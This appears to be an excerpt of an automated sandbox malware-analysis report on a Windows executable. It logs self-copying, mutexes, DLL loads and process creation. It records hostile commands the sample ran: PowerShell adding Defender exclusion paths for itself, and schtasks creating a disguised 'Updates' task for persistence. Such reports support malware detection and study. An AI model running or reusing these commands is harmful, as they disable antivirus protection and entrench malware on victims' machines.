                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeMutant created: \Sessions\1\BaseNamedObjects\RKUAsnF
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-Y7J88P
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeFile created: C:\Users\user\AppData\Local\Temp\tmp53D2.tmpJump to behavior
                  Source: PEbZthAqV9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: PEbZthAqV9.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: PEbZthAqV9.exeReversingLabs: Detection: 63%
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeFile read: C:\Users\user\Desktop\PEbZthAqV9.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\PEbZthAqV9.exe "C:\Users\user\Desktop\PEbZthAqV9.exe"
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Users\user\Desktop\PEbZthAqV9.exe "C:\Users\user\Desktop\PEbZthAqV9.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Users\user\Desktop\PEbZthAqV9.exe "C:\Users\user\Desktop\PEbZthAqV9.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: PEbZthAqV9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: PEbZthAqV9.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: PEbZthAqV9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
